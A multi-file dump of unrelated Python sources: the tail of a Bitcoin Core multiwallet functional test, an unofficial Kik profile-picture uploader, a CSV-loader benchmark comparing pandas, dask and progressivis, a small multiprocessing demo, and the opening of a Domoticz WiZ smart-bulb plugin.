        # Path helpers: data_dir -> the node's datadir, wallet_dir -> its
        # wallets/ subtree, wallet -> a per-wallet RPC proxy.
        data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
        wallet_dir = lambda *p: data_dir('wallets', *p)
        wallet = lambda name: node.get_wallet_rpc(name)

        def wallet_file(name):
            # Resolve a wallet name to the on-disk file that backs it.
            if name == self.default_wallet_name:
                return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
            if os.path.isdir(wallet_dir(name)):
                return wallet_dir(name, "wallet.dat")
            return wallet_dir(name)

        assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})

        # check wallet.dat is created
        self.stop_nodes()
        assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)

        # create symlink to verify wallet directory path can be referenced
        # through symlink
        os.mkdir(wallet_dir('w7'))
        os.symlink('w7', wallet_dir('w7_symlink'))
        os.symlink('..', wallet_dir('recursive_dir_symlink'))
        os.mkdir(wallet_dir('self_walletdat_symlink'))
        os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))

        # rename wallet.dat to make sure plain wallet file paths (as opposed to
        # directory paths) can be loaded
        # create another dummy wallet for use in testing backups later
        self.start_node(0)
        node.createwallet("empty")
        node.createwallet("plain")
        node.createwallet("created")
        self.stop_nodes()
        empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
        os.rename(wallet_file("empty"), empty_wallet)
        shutil.rmtree(wallet_dir("empty"))
        empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
        os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
        shutil.rmtree(wallet_dir("created"))
        os.rename(wallet_file("plain"), wallet_dir("w8"))
        shutil.rmtree(wallet_dir("plain"))

        # restart node with a mix of wallet names:
        # w1, w2, w3 - to verify new wallets created when non-existing paths specified
        # w - to verify wallet name matching works when one wallet path is prefix of another
        # sub/w5 - to verify relative wallet path is created correctly
        # extern/w6 - to verify absolute wallet path is created correctly
        # w7_symlink - to verify symlinked wallet path is initialized correctly
        # w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
        # '' - to verify default wallet file is created correctly
        to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
        in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create]  # Wallets in the wallet dir
        in_wallet_dir.append('w7')  # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
        to_create.append(os.path.join(self.options.tmpdir, 'extern/w6'))  # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
        to_load = [self.default_wallet_name]
        if not self.options.descriptors:
            to_load.append('w8')
        wallet_names = to_create + to_load  # Wallet names loaded in the wallet
        in_wallet_dir += to_load  # The loaded wallets are also in the wallet dir
        self.start_node(0)
        for wallet_name in to_create:
            self.nodes[0].createwallet(wallet_name)
        for wallet_name in to_load:
            self.nodes[0].loadwallet(wallet_name)

        # An unreadable directory inside the walletdir must not break listwalletdir.
        os.mkdir(wallet_dir('no_access'))
        os.chmod(wallet_dir('no_access'), 0)
        try:
            with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
                walletlist = self.nodes[0].listwalletdir()['wallets']
        finally:
            # Need to ensure access is restored for cleanup
            os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
        assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))

        assert_equal(set(node.listwallets()), set(wallet_names))

        # should raise rpc error if wallet path can't be created
        err_code = -4 if self.options.descriptors else -1
        assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")

        # check that all requested wallets were created
        self.stop_node(0)
        for wallet_name in wallet_names:
            assert_equal(os.path.isfile(wallet_file(wallet_name)), True)

        # -walletdir validation at startup.
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
        self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())

        # Duplicate -wallet arguments are tolerated with a warning.
        self.start_node(0, ['-wallet=w1', '-wallet=w1'])
        self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')

        if not self.options.descriptors:
            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # should not initialize if one wallet is a copy of another
            shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
            in_wallet_dir.append('w8_copy')
            exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

            # should not initialize if wallet file is a symlink
            os.symlink('w8', wallet_dir('w8_symlink'))
            self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)

        # should not initialize if the specified walletdir does not exist
        self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
        # should not initialize if the specified walletdir is not a directory
        not_a_dir = wallet_dir('notadir')
        open(not_a_dir, 'a', encoding="utf8").close()
        self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')

        self.log.info("Do not allow -upgradewallet with multiwallet")
        self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")

        # if wallets/ doesn't exist, datadir should be the default wallet dir
        wallet_dir2 = data_dir('walletdir')
        os.rename(wallet_dir(), wallet_dir2)
        self.start_node(0)
        self.nodes[0].createwallet("w4")
        self.nodes[0].createwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        self.generatetoaddress(node, nblocks=1, address=w5.getnewaddress(), sync_fun=self.no_op)

        # now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
        os.rename(wallet_dir2, wallet_dir())
        self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
        self.nodes[0].loadwallet("w4")
        self.nodes[0].loadwallet("w5")
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        w5_info = w5.getwalletinfo()
        assert_equal(w5_info['immature_balance'], 50)

        # A second node must not be able to share the same walletdir.
        competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
        os.mkdir(competing_wallet_dir)
        self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
        self.nodes[0].createwallet(self.default_wallet_name)
        if self.options.descriptors:
            exp_stderr = f"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?"
        else:
            exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
        self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)

        self.restart_node(0)
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        wallets = [wallet(w) for w in wallet_names]
        wallet_bad = wallet("bad")

        # check wallet names and balances
        self.generatetoaddress(node, nblocks=1, address=wallets[0].getnewaddress(), sync_fun=self.no_op)
        # NOTE(review): the loop variable below shadows the `wallet` helper
        # lambda defined at the top of this method (it is rebound again later).
        for wallet_name, wallet in zip(wallet_names, wallets):
            info = wallet.getwalletinfo()
            assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
            assert_equal(info['walletname'], wallet_name)

        # accessing invalid wallet fails
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)

        # accessing wallet RPC without using wallet endpoint fails
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)

        w1, w2, w3, w4, *_ = wallets
        self.generatetoaddress(node, nblocks=COINBASE_MATURITY + 1, address=w1.getnewaddress(), sync_fun=self.no_op)
        assert_equal(w1.getbalance(), 100)
        assert_equal(w2.getbalance(), 0)
        assert_equal(w3.getbalance(), 0)
        assert_equal(w4.getbalance(), 0)

        w1.sendtoaddress(w2.getnewaddress(), 1)
        w1.sendtoaddress(w3.getnewaddress(), 2)
        w1.sendtoaddress(w4.getnewaddress(), 3)
        self.generatetoaddress(node, nblocks=1, address=w1.getnewaddress(), sync_fun=self.no_op)
        assert_equal(w2.getbalance(), 1)
        assert_equal(w3.getbalance(), 2)
        assert_equal(w4.getbalance(), 3)

        # Batched RPC requests are dispatched to the endpoint's wallet.
        batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
        assert_equal(batch[0]["result"]["chain"], self.chain)
        assert_equal(batch[1]["result"]["walletname"], "w1")

        self.log.info('Check for per-wallet settxfee call')
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], 0)
        w2.settxfee(0.001)
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))

        self.log.info("Test dynamic wallet loading")

        self.restart_node(0, ['-nowallet'])
        assert_equal(node.listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)

        self.log.info("Load first wallet")
        loadwallet_name = node.loadwallet(wallet_names[0])
        assert_equal(loadwallet_name['name'], wallet_names[0])
        assert_equal(node.listwallets(), wallet_names[0:1])
        node.getwalletinfo()
        w1 = node.get_wallet_rpc(wallet_names[0])
        w1.getwalletinfo()

        self.log.info("Load second wallet")
        loadwallet_name = node.loadwallet(wallet_names[1])
        assert_equal(loadwallet_name['name'], wallet_names[1])
        assert_equal(node.listwallets(), wallet_names[0:2])
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w2 = node.get_wallet_rpc(wallet_names[1])
        w2.getwalletinfo()

        self.log.info("Concurrent wallet loading")
        threads = []
        for _ in range(3):
            n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
            t = Thread(target=test_load_unload, args=(n, wallet_names[2]))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        global got_loading_error
        assert_equal(got_loading_error, True)

        self.log.info("Load remaining wallets")
        for wallet_name in wallet_names[2:]:
            loadwallet_name = self.nodes[0].loadwallet(wallet_name)
            assert_equal(loadwallet_name['name'], wallet_name)

        assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))

        # Fail to load if wallet doesn't exist
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')

        # Fail to load duplicate wallets
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
        if self.options.descriptors:
            assert_raises_rpc_error(-4, f"Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another instance of {self.config['environment']['PACKAGE_NAME']}?", self.nodes[0].loadwallet, wallet_names[0])
        else:
            assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])

            # This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
            # Fail to load duplicate wallets by different ways (directory and filepath)
            path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
            assert_raises_rpc_error(-35, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')

            # Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
            # Fail to load if one wallet is a copy of another
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
            assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')

            # Fail to load if wallet file is a symlink
            assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')

        # Fail to load if a directory is specified that doesn't contain a wallet
        os.mkdir(wallet_dir('empty_wallet_dir'))
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
        assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')

        self.log.info("Test dynamic wallet creation.")
        # Fail to create a wallet if it already exists.
        path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
        assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')

        # Successfully create a wallet with a new name
        loadwallet_name = self.nodes[0].createwallet('w9')
        in_wallet_dir.append('w9')
        assert_equal(loadwallet_name['name'], 'w9')
        w9 = node.get_wallet_rpc('w9')
        assert_equal(w9.getwalletinfo()['walletname'], 'w9')
        assert 'w9' in self.nodes[0].listwallets()

        # Successfully create a wallet using a full path
        new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
        new_wallet_name = os.path.join(new_wallet_dir, 'w10')
        loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
        assert_equal(loadwallet_name['name'], new_wallet_name)
        w10 = node.get_wallet_rpc(new_wallet_name)
        assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
        assert new_wallet_name in self.nodes[0].listwallets()

        self.log.info("Test dynamic wallet unloading")
        # Test `unloadwallet` errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        # NOTE(review): the trailing comma turns this statement into a 1-tuple
        # expression; harmless but almost certainly unintended.
        assert_raises_rpc_error(-8, "RPC endpoint wallet and wallet_name parameter specify different wallets", w1.unloadwallet, "w2"),

        # Successfully unload the specified wallet name
        self.nodes[0].unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Unload w1 again, this time providing the wallet name twice
        self.nodes[0].loadwallet("w1")
        assert 'w1' in self.nodes[0].listwallets()
        w1.unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()

        # Successfully unload the wallet referenced by the request endpoint
        # Also ensure unload works during walletpassphrase timeout
        w2.encryptwallet('test')
        w2.walletpassphrase('test', 1)
        w2.unloadwallet()
        time.sleep(1.1)
        assert 'w2' not in self.nodes[0].listwallets()

        # Successfully unload all wallets
        for wallet_name in self.nodes[0].listwallets():
            self.nodes[0].unloadwallet(wallet_name)
        assert_equal(self.nodes[0].listwallets(), [])
        assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)

        # Successfully load a previously unloaded wallet
        self.nodes[0].loadwallet('w1')
        assert_equal(self.nodes[0].listwallets(), ['w1'])
        assert_equal(w1.getwalletinfo()['walletname'], 'w1')

        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))

        # Test backing up and restoring wallets
        self.log.info("Test wallet backup")
        self.restart_node(0, ['-nowallet'])
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)
        for wallet_name in wallet_names:
            rpc = self.nodes[0].get_wallet_rpc(wallet_name)
            addr = rpc.getnewaddress()
            backup = os.path.join(self.options.tmpdir, 'backup.dat')
            if os.path.exists(backup):
                os.unlink(backup)
            rpc.backupwallet(backup)
            self.nodes[0].unloadwallet(wallet_name)
            # Swap in an empty wallet: the backed-up address must not be ours...
            shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
            self.nodes[0].unloadwallet(wallet_name)
            # ...and must be ours again once the backup is restored.
            shutil.copyfile(backup, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], True)

        # Test .walletlock file is closed
        self.start_node(1)
        # NOTE(review): rebinds the `wallet` helper once more, to a path string.
        wallet = os.path.join(self.options.tmpdir, 'my_wallet')
        self.nodes[0].createwallet(wallet)
        if self.options.descriptors:
            assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
        else:
            assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
        self.nodes[0].unloadwallet(wallet)
        self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
    # Script entry point: run the multiwallet functional test directly.
    MultiWalletTest().main()
|
profile_pictures.py | import logging
import os
from threading import Thread
import requests
from kik_unofficial.device_configuration import kik_version_info
from kik_unofficial.datatypes.exceptions import KikApiException, KikUploadError
from kik_unofficial.utilities.cryptographic_utilities import CryptographicUtils
from kik_unofficial.utilities.parsing_utilities import get_file_bytes
log = logging.getLogger('kik_unofficial')
def set_profile_picture(file, jid, username, password):
    """Upload *file* as the Kik account's profile picture."""
    send('https://profilepicsup.kik.com/profilepics', file, jid, username, password)
def set_background_picture(file, jid, username, password):
    """Upload *file* as the Kik account's background picture."""
    send('https://profilepicsup.kik.com/profilepics?extension_type=BACKGROUND', file, jid, username, password)
def send(url, filename, jid, username, password):
    """Validate *filename*, build the Kik auth headers and fire off a
    background thread that uploads the picture to *url*."""
    auth_key = CryptographicUtils.key_from_password(username, password)
    if not os.path.isfile(filename):
        raise KikApiException("File doesn't exist")
    request_headers = {
        'x-kik-jid': jid,
        'x-kik-password': auth_key,
        'User-Agent': f'Kik/{kik_version_info["kik_version"]} (Android 7.1.2) Dalvik/2.1.0 (Linux; U; Android 7.1.2; Nexus 7 Build/NJH47F)',
    }
    uploader = Thread(target=picture_upload_thread, args=(url, filename, request_headers), name='KikProfilepics')
    uploader.start()
def picture_upload_thread(url, filename, headers):
    """Worker body for the upload thread: read the file and POST its bytes.

    Raises:
        KikUploadError: if the server responds with any status other than 200.
    """
    picture_data = get_file_bytes(filename)
    log.debug('Uploading picture')
    # A timeout is essential here: without one a dead connection would hang
    # this background thread forever (10s to connect, 60s to finish reading).
    r = requests.post(url, data=picture_data, headers=headers, timeout=(10, 60))
    if r.status_code != 200:
        # NOTE(review): this raises inside a daemon-less worker thread, so the
        # error is only visible via the default threading excepthook.
        raise KikUploadError(r.status_code, r.reason)
|
bmkit_load_csv_mp.py | import pandas as pd
import csv
from progressivis import Scheduler
from progressivis.io import CSVLoader
from progressivis.table.constant import Constant
from progressivis.table.table import Table
from progressivis.datasets import get_dataset
from benchmarkit import BenchMarkIt
import sys
import os
import os.path
import subprocess
import glob
import gc
import sqlite3
from collections import OrderedDict
from multiprocessing import Process
import dask.dataframe as dd
def p10s_read_csv(f):
    """Load *f* through progressivis' streaming CSV loader and run its scheduler."""
    sched = Scheduler()
    # keep a reference: constructing the loader registers it with the scheduler
    loader = CSVLoader(f, index_col=False, header=None, scheduler=sched)
    sched.start()
def none_read_csv(f):
    """Baseline benchmark: scan the file line by line without any parsing.

    Reads in binary mode so no decoding cost is measured; returns None.
    (The unused ``res`` accumulator from the original was dead code.)
    """
    with open(f, 'rb') as csvfile:
        for _ in csvfile:
            pass
def naive_read_csv(f):
    """Parse a headerless all-float CSV into ``{column_index: [values]}``.

    Pure-Python reference implementation for the benchmark. Fixed for
    Python 3: the original opened the file in binary mode ('rb'), which makes
    ``csv.reader`` raise ("iterator should return strings"); the csv module
    requires text mode with ``newline=''``.
    """
    res = {}
    with open(f, 'r', newline='') as csvfile:
        reader = csv.reader(csvfile, delimiter=',')
        try:
            # the first row establishes the column set
            first = next(reader)
        except StopIteration:
            return res  # empty file -> empty result
        for i, cell in enumerate(first):
            res[i] = [float(cell)]
        for row in reader:
            for i, cell in enumerate(row):
                res[i].append(float(cell))
    return res
def dask_read_csv(f):
    """Read *f* with dask.dataframe, forcing full materialization via compute()."""
    dd.read_csv(f).compute()
def cleanup_hdf5():
    """Delete progressivis scratch data left under /tmp.

    Equivalent of the original ``subprocess.call(['/bin/rm', '-rf', d])`` but
    portable and without spawning a shell process per entry.
    """
    import shutil  # stdlib; not in this file's top-level imports
    for path in glob.glob('/tmp/progressivis_*'):
        if os.path.isdir(path):
            shutil.rmtree(path, ignore_errors=True)
        else:
            # the glob can also match plain files; mirror `rm -rf` semantics
            try:
                os.remove(path)
            except OSError:
                pass
# Registry of benchmark loaders keyed by display label; the ordering fixes
# the sequence in which benchmarks run and results are reported.
func_dict = OrderedDict([("Empty", none_read_csv), ("Pandas",pd.read_csv),("Dask", dask_read_csv),
                         ("Progressivis", p10s_read_csv), ("Naive", naive_read_csv)])
def bmkit_worker(csv_file, db_name, label, mode, nb_lines):
    """Benchmark one loader against *csv_file* and record the result.

    Runs in a child process so every measurement starts from a clean
    interpreter. *mode* selects the measurement: 'time' records elapsed/sys/
    user times, 'mem' records memory. Results are written to the per-loader
    table of the sqlite database *db_name*, keyed by *nb_lines* (megalines).
    """
    func = func_dict[label]
    mem_flag = (mode == 'mem')
    time_flag = (mode == 'time')
    bm = BenchMarkIt(func, [csv_file], label=label)
    bm.run(tm=time_flag, mem=mem_flag)
    d = bm.to_dict()
    print(d)
    conn = sqlite3.connect(db_name)
    try:
        c = conn.cursor()
        # Table names come from the fixed internal label set, so the .format()
        # interpolation never sees external input; row values are parameterized.
        if mem_flag:
            c.execute("UPDATE {}_tbl SET memory=? WHERE mega_lines=?".format(
                label.lower()), (d['memory'], nb_lines,))
        if time_flag:
            c.execute('''UPDATE {}_tbl SET elapsed_time=?,
            sys_time=?, user_time=? WHERE mega_lines=?'''.format(
                label.lower()), (d['elapsed_time'], d['sys_time'], d['user_time'], nb_lines,))
        conn.commit()
    finally:
        # release the connection even if an UPDATE fails (the original leaked it)
        conn.close()
    cleanup_hdf5()
if __name__=='__main__':
    # CLI driver: create the results database, then benchmark every loader
    # against every CSV file, each run in its own child process so the
    # measurements don't contaminate each other.
    if len(sys.argv) < 3:
        print("Usage {} <dbname> <csvfile1> [<csvfile2>...<csvfileN>]".format(sys.argv[0]))
        sys.exit()
    db_name = sys.argv[1]
    labels = func_dict.keys()
    low_labels = [e.lower() for e in labels]
    if os.path.exists(db_name):
        print("Database {} already exists, exit".format(db_name))
        sys.exit()
    conn = sqlite3.connect(db_name)
    c = conn.cursor()
    for llab in low_labels:
        c.execute('''CREATE TABLE {}_tbl
        (mega_lines integer, memory real, elapsed_time real,
        sys_time real, user_time real)'''.format(llab))
    csv_file_dict = {}
    for csv_file in sys.argv[2:]:
        # `wc -l` output is bytes like b"  1000000 file\n"; split() (no
        # argument) handles both the bytes/str mismatch that broke the
        # original .split(' ') under Python 3 and the leading whitespace.
        wc_out = subprocess.check_output(['wc', '-l', csv_file])
        nb_lines = int(wc_out.split()[0])
        nb_mega = nb_lines // 1000000
        csv_file_dict[csv_file] = nb_mega
        for llab in low_labels:
            # pre-create one row per loader; workers UPDATE it later
            c.execute("INSERT INTO {}_tbl VALUES(?, ?, ?, ?, ?)".format(llab),
                      (nb_mega,
                       None, None, None, None))
    conn.commit()
    conn.close()
    for csv_file in sys.argv[2:]:
        for lab in labels:
            # time and memory are measured in separate processes because
            # memory tracking perturbs timing
            p = Process(target=bmkit_worker, args=(csv_file, db_name, lab, 'time', csv_file_dict[csv_file]))
            p.start()
            p.join()
            p = Process(target=bmkit_worker, args=(csv_file, db_name, lab, 'mem', csv_file_dict[csv_file]))
            p.start()
            p.join()
|
tsetmp.py | __about__="Multiprocessing Example"
import multiprocessing
def calc_squares(n):
    """Print the square of every number in the iterable *n*."""
    for value in n:
        print(f"Square of:{value}:is:", value * value)
def calc_cube(n):
    """Print the cube of every number in the iterable *n*."""
    for value in n:
        print(f"Cubes of:{value}:is:", value * value * value)
if __name__=='__main__':
    # Run the square and cube printers in parallel worker processes.
    numbers = [1, 2, 3, 4, 5, 6, 7]
    workers = [
        multiprocessing.Process(target=calc_squares, args=(numbers,)),
        multiprocessing.Process(target=calc_cube, args=(numbers,)),
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
plugin.py | # Domoticz WiZ connected Plugin
#
# Author: Syds Post sydspost@gmail.com
# Color bulbs support & UDP discovery by Faust93 monumentum@gmail.com
#
"""
<plugin key="wiz" name="WiZ connected" author="Syds Post" version="1.0.0" wikilink="" externallink="https://www.wizconnected.com/">
<description>
<h2>WiZ connected Plugin</h2><br/>
This plugin is meant to control WiZ connected devices. WiZ connected devices may come with different brands as Philips, TAO and WiZ connected etc.
<h3>Features</h3>
<ul style="list-style-type:square">
<li>Auto-detection of devices on network</li>
<li>On/Off control, state and available status display</li>
<li>RGBWW & Dimmer/Warm-cold setting for Lights</li>
<!-- <li>Scene activation support</li> -->
</ul>
<h3>Devices</h3>
<ul style="list-style-type:square">
<li>All devices that have on/off state should be supported</li>
</ul>
<h3>Configuration</h3>
Devices can be renamed in Domoticz or you can rename them in the App and remove them from Domoticz so they are detected with a new name or layout.
</description>
<params>
<param field="Mode1" label="Broadcast Space" width="200px" required="true" default="192.168.1.255"/>
<param field="Mode6" label="Debug" width="150px">
<options>
<option label="None" value="0" default="true" />
<option label="Python Only" value="2"/>
<option label="Basic Debugging" value="62"/>
<option label="Basic+Messages" value="126"/>
<option label="Connections Only" value="16"/>
<option label="Connections+Python" value="18"/>
<option label="Connections+Queue" value="144"/>
<option label="All" value="-1"/>
</options>
</param>
</params>
</plugin>
"""
import Domoticz
import threading
import socket
import html
import sys
import time
import math
import json
import re
import asyncio
#from scapy.all import srp,Ether,ARP,conf
from pywizlight import wizlight, PilotBuilder, discovery
class BasePlugin:
    """Domoticz plugin object: discovers WiZ bulbs on the LAN and mirrors
    their on/off, dimming and color state into Domoticz devices."""
    # True until the first discovery pass has run (kept as-is from original)
    startup = True;
    # cache of known devices (unused in the visible code paths)
    devs = {}
    # epoch seconds of the last status refresh; throttles onHeartbeat
    last_update = 0
    # asyncio event loop used for pywizlight discovery
    loop = None

    def __init__(self):
        return
    async def discovery(self, init = True):
        """Broadcast-discover WiZ bulbs on the configured subnet.

        When *init* is True, create a Domoticz device for every bulb not seen
        before and return None; otherwise just return the discovered bulb list.
        """
        bulbs = await discovery.discover_lights(broadcast_space=Parameters["Mode1"])
        if init != True:
            return bulbs
        for bulb in bulbs:
            bulb_type = await bulb.get_bulbtype()
            deviceFound = False
            # a bulb is "known" when some Domoticz device carries its IP as DeviceID
            for Device in Devices:
                if ((bulb.ip == Devices[Device].DeviceID)): deviceFound = True
            if (deviceFound == False):
                # Subtype 4 = RGBWW color bulb, Subtype 8 = tunable white
                if bulb_type.features.color:
                    Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=4, Switchtype=7, Image=0).Create()
                else:
                    Domoticz.Device(Name=bulb_type.name, DeviceID=bulb.ip, Unit=len(Devices)+1, Type=241, Subtype=8, Switchtype=7, Image=0).Create()
    def onStart(self):
        """Plugin start-up: configure debugging, run an initial discovery and
        launch the background status-update thread."""
        Domoticz.Log("WiZ connected plugin started")
        if Parameters["Mode6"] != "0":
            Domoticz.Debugging(int(Parameters["Mode6"]))
            DumpConfigToLog()
        self.loop = asyncio.get_event_loop()
        self.loop.run_until_complete(self.discovery())
        # Create/Start update thread
        self.updateThread = threading.Thread(name="WiZUpdateThread", target=BasePlugin.handleThread, args=(self,))
        self.updateThread.start()
    def onStop(self):
        """Plugin shutdown: block until the background update thread finishes."""
        Domoticz.Debug("onStop called")
        # Busy-wait until only the main thread remains so Domoticz can unload safely.
        while (threading.active_count() > 1):
            time.sleep(1.0)
    def onConnect(self, Connection, Status, Description):
        """Connection callback; unused — this plugin sends raw UDP directly."""
        Domoticz.Debug("onConnect called")

    def onMessage(self, Connection, Data):
        """Message callback; unused — this plugin sends raw UDP directly."""
        Domoticz.Debug("onMessage called")
    def onCommand(self, Unit, Command, Level, Color):
        """Translate a Domoticz command (On/Off/Set Color/Set Level) into a
        WiZ setPilot JSON datagram sent to the bulb on UDP port 38899, then
        reflect the new state back into the Domoticz device."""
        Domoticz.Debug("onCommand called for Unit " + str(Unit) + ": Parameter '" + str(Command) + "', Level: " + str(Level))
        # Find the device for the Domoticz Unit provided
        dev = None
        try:
            dev = Devices[Unit]
        except Exception as e:
            Domoticz.Debug("Device has no ID " + str(Unit) + " " + str(e))
        # If we didn't find it, leave (probably disconnected at this time)
        if dev == None:
            # NOTE(review): this lookup of Devices[Unit] will itself raise when
            # the unit is missing — probably meant to use a literal message.
            Domoticz.Error('Command for DeviceID='+Devices[Unit].DeviceID+' but device is not available.')
            return
        # if not dev.available():
        #     Domoticz.Error('Command for DeviceID='+Devices[Unit].DeviceID+' but device is offline.')
        #     return
